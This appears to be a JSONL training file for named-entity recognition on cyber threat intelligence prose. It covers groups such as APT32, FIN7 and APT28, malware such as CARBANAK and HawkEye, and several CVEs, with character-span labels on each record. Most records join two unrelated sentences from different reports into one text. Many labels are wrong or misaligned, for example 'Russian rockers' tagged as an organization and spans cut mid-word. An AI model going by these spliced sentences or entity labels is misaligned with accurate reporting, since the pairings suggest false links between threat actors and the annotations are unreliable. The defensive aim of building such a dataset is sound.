{"text": "This focused intelligence and detection effort led to new external victim identifications as well as providing sufficient technical evidence to link twelve prior intrusions , consolidating four previously unrelated clusters of threat actor activity into FireEye\u2019s newest named advanced persistent threat group: APT32 . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed \u2013 most likely detections were related to students\u2019 and researchers\u2019 scanning known collected samples and any incidents\u201d remain unconfirmed and unknown .", "spans": [{"start": 254, "end": 263, "label": "Organization"}, {"start": 311, "end": 316, "label": "Organization"}, {"start": 412, "end": 419, "label": "Organization"}, {"start": 432, "end": 452, "label": "Organization"}]}
{"text": "In mid-2016 , malware that FireEye believes to be unique to APT32 was detected on the networks of a global hospitality industry developer with plans to expand operations into Vietnam . The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking .", "spans": [{"start": 3, "end": 11, "label": "Organization"}, {"start": 27, "end": 34, "label": "Organization"}, {"start": 60, "end": 65, "label": "Organization"}, {"start": 107, "end": 118, "label": "Organization"}, {"start": 213, "end": 225, "label": "Organization"}, {"start": 230, "end": 239, "label": "Organization"}, {"start": 242, "end": 261, "label": "Organization"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 276, "end": 289, "label": "Organization"}, {"start": 306, "end": 315, "label": "Organization"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 366, "end": 373, "label": "Organization"}]}
{"text": "In March 2017 , in response to active targeting of FireEye clients , the team launched a Community Protection Event (CPE) \u2013 a coordinated effort between Mandiant incident responders , FireEye as a Service (FaaS) , FireEye iSight Intelligence , and FireEye product engineering \u2013 to protect all clients from APT32 activity . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel .", "spans": [{"start": 51, "end": 58, "label": "Organization"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 214, "end": 241, "label": "Organization"}, {"start": 248, "end": 255, "label": "Organization"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 419, "end": 440, "label": "Organization"}, {"start": 451, "end": 460, "label": "Organization"}, {"start": 465, "end": 484, "label": "Organization"}]}
{"text": "In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . This could include diplomats , experts in the LOCs of interest related to the Digital Economy Task Force , or possibly even journalists .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 48, "end": 64, "label": "Malware"}, {"start": 167, "end": 176, "label": "Organization"}, {"start": 272, "end": 283, "label": "Organization"}]}
{"text": "APT32 actors continue to deliver the malicious attachments via spear-phishing emails . This focus on training aligns with LYCEUM\u2019s targeting of executives , HR staff , and IT personnel .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 37, "end": 58, "label": "Malware"}, {"start": 122, "end": 130, "label": "Organization"}, {"start": 144, "end": 154, "label": "Organization"}, {"start": 157, "end": 165, "label": "Organization"}, {"start": 172, "end": 184, "label": "Organization"}]}
{"text": "APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 57, "end": 78, "label": "Malware"}, {"start": 155, "end": 161, "label": "Malware"}, {"start": 186, "end": 189, "label": "Organization"}, {"start": 193, "end": 201, "label": "Organization"}, {"start": 204, "end": 210, "label": "Organization"}]}
{"text": "In the following weeks , FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32\u2019s tools and phishing lures . The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": [{"start": 25, "end": 32, "label": "Organization"}, {"start": 159, "end": 166, "label": "Organization"}, {"start": 205, "end": 212, "label": "Organization"}, {"start": 213, "end": 219, "label": "System"}, {"start": 266, "end": 283, "label": "Indicator"}, {"start": 348, "end": 353, "label": "Organization"}]}
{"text": "Also in 2014 , APT32 carried out an intrusion against a Western country\u2019s national legislature . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails .", "spans": [{"start": 15, "end": 20, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 138, "end": 143, "label": "System"}, {"start": 160, "end": 164, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 210, "end": 216, "label": "System"}]}
{"text": "In 2015 , SkyEye Labs , the security research division of the Chinese firm Qihoo 360 , released a report detailing threat actors that were targeting Chinese public and private entities including government agencies , research institutes , maritime agencies , sea construction , and shipping enterprises . While OceanLotus\u2019 targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam .", "spans": [{"start": 10, "end": 21, "label": "Organization"}, {"start": 75, "end": 84, "label": "Organization"}, {"start": 195, "end": 214, "label": "Organization"}, {"start": 217, "end": 236, "label": "Organization"}, {"start": 239, "end": 256, "label": "Organization"}, {"start": 259, "end": 275, "label": "Organization"}, {"start": 282, "end": 302, "label": "Organization"}, {"start": 311, "end": 322, "label": "Organization"}, {"start": 475, "end": 494, "label": "Organization"}, {"start": 497, "end": 506, "label": "Organization"}, {"start": 513, "end": 523, "label": "Organization"}]}
{"text": "In order to track who opened the phishing emails , viewed the links , and downloaded the attachments in real-time , APT32 used cloud-based email analytics software designed for sales organizations . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": [{"start": 116, "end": 121, "label": "Organization"}, {"start": 177, "end": 196, "label": "Organization"}, {"start": 203, "end": 212, "label": "Organization"}, {"start": 227, "end": 233, "label": "System"}, {"start": 259, "end": 268, "label": "Indicator"}, {"start": 272, "end": 311, "label": "Organization"}]}
{"text": "Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnama's manufacturing , consumer products , and hospitality sectors . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 22, "end": 29, "label": "Organization"}, {"start": 43, "end": 48, "label": "Organization"}, {"start": 117, "end": 130, "label": "Organization"}, {"start": 133, "end": 150, "label": "Organization"}, {"start": 157, "end": 176, "label": "Organization"}, {"start": 205, "end": 221, "label": "Indicator"}, {"start": 241, "end": 279, "label": "Organization"}, {"start": 282, "end": 286, "label": "Organization"}, {"start": 308, "end": 318, "label": "Organization"}, {"start": 323, "end": 336, "label": "Organization"}]}
{"text": "Mandiant consultants suspect that APT32 was monitoring web logs to track the public IP address used to request remote images . Based on this , we believe the Rancor attackers were targeting political entities .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 34, "end": 39, "label": "Organization"}, {"start": 158, "end": 164, "label": "Organization"}, {"start": 165, "end": 174, "label": "Organization"}, {"start": 190, "end": 208, "label": "Organization"}]}
{"text": "APT32 often deploys these backdoors along with the commercially-available Cobalt Strike BEACON backdoor . Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 26, "end": 35, "label": "System"}, {"start": 74, "end": 87, "label": "Organization"}, {"start": 88, "end": 94, "label": "System"}, {"start": 95, "end": 103, "label": "System"}, {"start": 112, "end": 118, "label": "Organization"}, {"start": 129, "end": 136, "label": "Organization"}, {"start": 139, "end": 145, "label": "Malware"}, {"start": 150, "end": 158, "label": "Organization"}, {"start": 224, "end": 246, "label": "Organization"}, {"start": 257, "end": 266, "label": "Organization"}]}
{"text": "The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in , or preparing to invest in , the country . Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers .", "spans": [{"start": 45, "end": 50, "label": "Organization"}, {"start": 66, "end": 73, "label": "Organization"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 209, "end": 224, "label": "Organization"}, {"start": 300, "end": 309, "label": "Organization"}]}
{"text": "While the motivation for each APT32 private sector compromise varied \u2013 and in some cases was unknown \u2013 the unauthorized access could serve as a platform for law enforcement , intellectual property theft , or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations . The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes .", "spans": [{"start": 30, "end": 35, "label": "Organization"}, {"start": 157, "end": 172, "label": "Organization"}, {"start": 342, "end": 355, "label": "Organization"}, {"start": 380, "end": 386, "label": "Organization"}, {"start": 391, "end": 408, "label": "Organization"}]}
{"text": "While actors from China , Iran , Russia , and North Korea remain the most active cyber espionage threats tracked and responded to by FireEye , APT32 reflects a growing host of new countries that have adopted this dynamic capability . The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin .", "spans": [{"start": 133, "end": 140, "label": "Organization"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 371, "end": 387, "label": "Organization"}, {"start": 429, "end": 447, "label": "Organization"}]}
{"text": "Several Mandiant investigations revealed that , after gaining access , APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s Invoke-Obfuscation framework . Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China .", "spans": [{"start": 8, "end": 16, "label": "Organization"}, {"start": 71, "end": 76, "label": "Organization"}, {"start": 149, "end": 171, "label": "System"}, {"start": 318, "end": 325, "label": "Organization"}, {"start": 410, "end": 416, "label": "Organization"}, {"start": 471, "end": 486, "label": "Organization"}]}
{"text": "Furthermore , APT32 continues to threaten political activism and free speech in Southeast Asia and the public sector worldwide . In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations .", "spans": [{"start": 14, "end": 19, "label": "Organization"}, {"start": 103, "end": 116, "label": "Organization"}, {"start": 143, "end": 156, "label": "Organization"}, {"start": 212, "end": 227, "label": "Organization"}, {"start": 245, "end": 255, "label": "Organization"}, {"start": 365, "end": 393, "label": "Organization"}]}
{"text": "North Korea's Office 39 is involved in activities such as gold smuggling , counterfeiting foreign currency , and even operating restaurants . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": [{"start": 267, "end": 287, "label": "Organization"}]}
{"text": "With these details , we will then draw some conclusions about the operators of CARBANAK . CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": [{"start": 79, "end": 87, "label": "Organization"}, {"start": 90, "end": 110, "label": "Organization"}, {"start": 154, "end": 160, "label": "Organization"}]}
{"text": "Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences .", "spans": [{"start": 80, "end": 88, "label": "Malware"}, {"start": 386, "end": 395, "label": "Organization"}]}
{"text": "Since May 2017 , Mandiant experts observed North Korean actors target at least three South Korean cryptocurrency exchanges with the suspected intent of stealing funds . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": [{"start": 17, "end": 25, "label": "Organization"}, {"start": 176, "end": 182, "label": "System"}, {"start": 197, "end": 217, "label": "Organization"}, {"start": 259, "end": 292, "label": "Indicator"}, {"start": 312, "end": 325, "label": "Vulnerability"}]}
{"text": "February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker , a macOS version of APT28\u2019s Xagent malware , and a new Trojan ransomware . In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day .", "spans": [{"start": 181, "end": 189, "label": "Organization"}, {"start": 211, "end": 218, "label": "Organization"}, {"start": 246, "end": 263, "label": "Malware"}, {"start": 412, "end": 418, "label": "System"}, {"start": 429, "end": 449, "label": "Organization"}]}
{"text": "Per a 2015 report from CitizenLab , Gamma Group licenses their software to clients and each client uses unique infrastructure , making it likely that the two documents are being used by a single client . The first time this happened was at the beginning of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan .", "spans": [{"start": 23, "end": 33, "label": "Organization"}, {"start": 36, "end": 47, "label": "Organization"}, {"start": 111, "end": 125, "label": "Organization"}, {"start": 274, "end": 284, "label": "Organization"}, {"start": 403, "end": 412, "label": "Organization"}]}
{"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel .", "spans": [{"start": 29, "end": 48, "label": "Malware"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 99, "end": 116, "label": "System"}, {"start": 150, "end": 164, "label": "Organization"}, {"start": 216, "end": 222, "label": "Malware"}, {"start": 225, "end": 233, "label": "Malware"}, {"start": 240, "end": 244, "label": "Malware"}, {"start": 345, "end": 359, "label": "Organization"}]}
{"text": "LATENTBOT is a modular and highly obfuscated type of malware first discovered by FireEye iSIGHT intelligence in December 2015 . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": [{"start": 0, "end": 9, "label": "System"}, {"start": 81, "end": 108, "label": "Organization"}, {"start": 145, "end": 158, "label": "Organization"}, {"start": 191, "end": 209, "label": "Organization"}, {"start": 229, "end": 235, "label": "System"}, {"start": 281, "end": 293, "label": "System"}, {"start": 294, "end": 307, "label": "Vulnerability"}]}
{"text": "It is capable of a variety of functions , including credential theft , hard drive and data wiping , disabling security software , and remote desktop functionality . In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso .", "spans": [{"start": 52, "end": 68, "label": "Malware"}, {"start": 71, "end": 81, "label": "Malware"}, {"start": 86, "end": 97, "label": "Malware"}, {"start": 100, "end": 127, "label": "Malware"}, {"start": 134, "end": 162, "label": "Malware"}, {"start": 300, "end": 305, "label": "Organization"}]}
{"text": "Additionally , this incident exposes the global nature of cyber threats and the value of worldwide perspective \u2013 a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 258, "end": 266, "label": "Organization"}, {"start": 340, "end": 360, "label": "Organization"}, {"start": 401, "end": 409, "label": "Vulnerability"}]}
{"text": "Recent DRIDEX activity began following a disclosure on April 7 , 2017 . The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 155, "end": 175, "label": "Organization"}, {"start": 216, "end": 224, "label": "Vulnerability"}]}
{"text": "This campaign primarily affected the government sector in the Middle East , U.S. , and Japan . Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 .", "spans": [{"start": 37, "end": 47, "label": "Organization"}, {"start": 152, "end": 161, "label": "Organization"}, {"start": 193, "end": 201, "label": "Organization"}, {"start": 212, "end": 217, "label": "Organization"}]}
{"text": "This campaign primarily affected the government sector in the Middle East , U.S. , and Japan . The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives .", "spans": [{"start": 37, "end": 54, "label": "Organization"}, {"start": 99, "end": 113, "label": "Organization"}, {"start": 283, "end": 293, "label": "Organization"}]}
{"text": "FireEye believes that two actors \u2013 Turla and an unknown financially motivated actor \u2013 were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions \u2014 often including military installations , intelligence agencies , and other government bodies .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 26, "end": 32, "label": "Organization"}, {"start": 56, "end": 67, "label": "Organization"}, {"start": 120, "end": 133, "label": "Vulnerability"}, {"start": 140, "end": 145, "label": "Organization"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 250, "end": 263, "label": "Vulnerability"}, {"start": 298, "end": 307, "label": "Organization"}, {"start": 373, "end": 379, "label": "Organization"}, {"start": 393, "end": 402, "label": "Organization"}, {"start": 407, "end": 415, "label": "Organization"}, {"start": 513, "end": 533, "label": "Organization"}, {"start": 538, "end": 550, "label": "Organization"}, {"start": 569, "end": 577, "label": "Organization"}, {"start": 594, "end": 615, "label": "Organization"}, {"start": 628, "end": 638, "label": "Organization"}]}
{"text": "Turla and APT28 are Russian cyber espionage groups that have used these zero-days against European diplomatic and military entities . Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek \u2014 the CEOs of Facebook , Twitter , Google and Spotify , respectively \u2014 have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 10, "end": 15, "label": "Organization"}, {"start": 114, "end": 122, "label": "Organization"}, {"start": 134, "end": 149, "label": "Organization"}, {"start": 152, "end": 163, "label": "Organization"}, {"start": 166, "end": 179, "label": "Organization"}, {"start": 186, "end": 195, "label": "Organization"}, {"start": 202, "end": 206, "label": "Organization"}, {"start": 210, "end": 218, "label": "Organization"}, {"start": 221, "end": 228, "label": "Organization"}, {"start": 231, "end": 237, "label": "Organization"}, {"start": 360, "end": 370, "label": "Organization"}]}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 260, "end": 263, "label": "Indicator"}, {"start": 311, "end": 318, "label": "Organization"}, {"start": 356, "end": 371, "label": "Organization"}, {"start": 375, "end": 382, "label": "Organization"}, {"start": 387, "end": 396, "label": "Organization"}, {"start": 426, "end": 434, "label": "Organization"}, {"start": 439, "end": 449, "label": "Organization"}]}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 89, "end": 96, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}, {"start": 138, "end": 141, "label": "Indicator"}, {"start": 189, "end": 196, "label": "Organization"}, {"start": 234, "end": 249, "label": "Organization"}, {"start": 253, "end": 260, "label": "Organization"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 304, "end": 312, "label": "Organization"}, {"start": 317, "end": 327, "label": "Organization"}]}
{"text": "It is possible that CVE-2017-8759 was being used by additional actors . Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February .", "spans": [{"start": 20, "end": 33, "label": "Vulnerability"}, {"start": 63, "end": 69, "label": "Organization"}, {"start": 115, "end": 123, "label": "Malware"}, {"start": 164, "end": 173, "label": "Organization"}, {"start": 184, "end": 200, "label": "Organization"}]}
{"text": "Russian cyber espionage actors use zero-day exploits in addition to less complex measures . Further tracking of the Lazarus\u2019s activities has enabled Kaspersky researchers to discover a new operation , active since at least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers .", "spans": [{"start": 116, "end": 125, "label": "Organization"}, {"start": 149, "end": 158, "label": "Organization"}, {"start": 254, "end": 264, "label": "Malware"}, {"start": 276, "end": 283, "label": "System"}, {"start": 321, "end": 336, "label": "Organization"}]}
{"text": "The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities . Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors .", "spans": [{"start": 20, "end": 31, "label": "Vulnerability"}, {"start": 43, "end": 53, "label": "System"}, {"start": 82, "end": 88, "label": "Organization"}, {"start": 124, "end": 129, "label": "Organization"}, {"start": 217, "end": 223, "label": "Organization"}]}
{"text": "Given the release of sensitive victim data , extortion , and destruction of systems , FireEye considers FIN10 to be one of the most disruptive threat actors observed in the region so far . Keeping in mind the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task .", "spans": [{"start": 86, "end": 93, "label": "Organization"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 236, "end": 243, "label": "Organization"}, {"start": 377, "end": 393, "label": "Organization"}]}
{"text": "To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe utility to register a custom shim database file containing a patch onto a system . The threat actor\u2019s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": [{"start": 66, "end": 70, "label": "Organization"}, {"start": 100, "end": 117, "label": "System"}, {"start": 134, "end": 145, "label": "Malware"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 248, "end": 254, "label": "System"}, {"start": 301, "end": 318, "label": "Indicator"}, {"start": 383, "end": 388, "label": "Organization"}]}
{"text": "During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe with their CARBANAK payload . The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 28, "end": 36, "label": "Organization"}, {"start": 51, "end": 55, "label": "Organization"}, {"start": 132, "end": 144, "label": "Malware"}, {"start": 156, "end": 164, "label": "System"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 217, "end": 226, "label": "Organization"}, {"start": 231, "end": 251, "label": "Organization"}, {"start": 291, "end": 297, "label": "System"}, {"start": 340, "end": 349, "label": "Organization"}]}
{"text": "FIN7 is a financially motivated intrusion set that selectively targets victims and uses spear phishing to distribute its malware . This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 10, "end": 21, "label": "Organization"}, {"start": 156, "end": 163, "label": "Organization"}, {"start": 220, "end": 229, "label": "Organization"}, {"start": 276, "end": 282, "label": "System"}, {"start": 289, "end": 298, "label": "Organization"}, {"start": 308, "end": 328, "label": "Organization"}, {"start": 364, "end": 379, "label": "Organization"}]}
{"text": "During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe with their CARBANAK payload . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 28, "end": 36, "label": "Organization"}, {"start": 51, "end": 55, "label": "Organization"}, {"start": 132, "end": 144, "label": "Malware"}, {"start": 156, "end": 164, "label": "System"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 206, "end": 220, "label": "Malware"}, {"start": 225, "end": 238, "label": "Malware"}, {"start": 239, "end": 246, "label": "Malware"}, {"start": 278, "end": 298, "label": "Organization"}]}
{"text": "CARBANAK malware has been used heavily by FIN7 in previous operations . The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 42, "end": 46, "label": "Organization"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 103, "end": 117, "label": "Malware"}, {"start": 122, "end": 135, "label": "Malware"}, {"start": 136, "end": 143, "label": "Malware"}, {"start": 175, "end": 195, "label": "Organization"}]}
{"text": "We have not yet identified FIN7\u2019s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft . The group previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 27, "end": 33, "label": "Organization"}, {"start": 113, "end": 129, "label": "Malware"}, {"start": 298, "end": 307, "label": "Organization"}, {"start": 312, "end": 332, "label": "Organization"}, {"start": 372, "end": 378, "label": "System"}, {"start": 421, "end": 430, "label": "Organization"}]}
{"text": "If the attackers are attempting to compromise persons involved in SEC filings due to their information access , they may ultimately be pursuing securities fraud or other investment abuse . The targets were similar to a 2015 TG-4127 campaign \u2014 individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists \u2014 but also included email accounts linked to the November 2016 United States presidential election .", "spans": [{"start": 7, "end": 16, "label": "Organization"}, {"start": 315, "end": 323, "label": "Organization"}, {"start": 328, "end": 348, "label": "Organization"}, {"start": 401, "end": 408, "label": "Organization"}, {"start": 413, "end": 423, "label": "Organization"}, {"start": 443, "end": 450, "label": "Organization"}, {"start": 455, "end": 466, "label": "Organization"}]}
{"text": "The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions , ATM compromise , and other monetization schemes . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 15, "end": 31, "label": "System"}, {"start": 35, "end": 39, "label": "Organization"}, {"start": 179, "end": 199, "label": "Organization"}, {"start": 389, "end": 400, "label": "Organization"}, {"start": 403, "end": 413, "label": "Organization"}, {"start": 416, "end": 432, "label": "Organization"}, {"start": 435, "end": 449, "label": "Organization"}, {"start": 456, "end": 466, "label": "Organization"}, {"start": 471, "end": 478, "label": "Organization"}, {"start": 502, "end": 520, "label": "Organization"}]}
{"text": "Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 24, "end": 38, "label": "Malware"}, {"start": 228, "end": 239, "label": "Organization"}, {"start": 244, "end": 254, "label": "Organization"}, {"start": 257, "end": 273, "label": "Organization"}, {"start": 276, "end": 290, "label": "Organization"}, {"start": 297, "end": 307, "label": "Organization"}, {"start": 312, "end": 319, "label": "Organization"}, {"start": 343, "end": 361, "label": "Organization"}]}
{"text": "The HawkEye malware is primarily used for credential theft and is often combined with additional tools to extract passwords from email and web browser applications . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": [{"start": 4, "end": 19, "label": "System"}, {"start": 166, "end": 171, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 200, "end": 221, "label": "Organization"}, {"start": 241, "end": 247, "label": "System"}]}
{"text": "HawkEye is a versatile Trojan used by diverse actors for multiple purposes . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 46, "end": 52, "label": "Organization"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 130, "end": 135, "label": "Organization"}, {"start": 163, "end": 171, "label": "Organization"}, {"start": 175, "end": 183, "label": "Organization"}]}
{"text": "We have seen different HawkEye campaigns infecting organizations across many sectors globally , and stealing user credentials for diverse online services . Russian citizens\u2014journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": [{"start": 23, "end": 30, "label": "Organization"}, {"start": 164, "end": 184, "label": "Organization"}, {"start": 187, "end": 206, "label": "Organization"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 223, "end": 250, "label": "Organization"}, {"start": 257, "end": 264, "label": "Organization"}, {"start": 286, "end": 296, "label": "Organization"}]}
{"text": "Mandiant disclosed these vulnerabilities to Lenovo in May of 2016 . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 178, "end": 189, "label": "Organization"}, {"start": 214, "end": 224, "label": "Organization"}, {"start": 229, "end": 240, "label": "Organization"}]}
{"text": "For our M-Trends 2017 report , we took a look at the incidents we investigated last year and provided a global and regional (the Americas , APAC and EMEA) analysis focused on attack trends , and defensive and emerging trends . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": [{"start": 8, "end": 16, "label": "Organization"}, {"start": 195, "end": 204, "label": "Organization"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 341, "end": 352, "label": "Indicator"}, {"start": 412, "end": 420, "label": "Organization"}]}
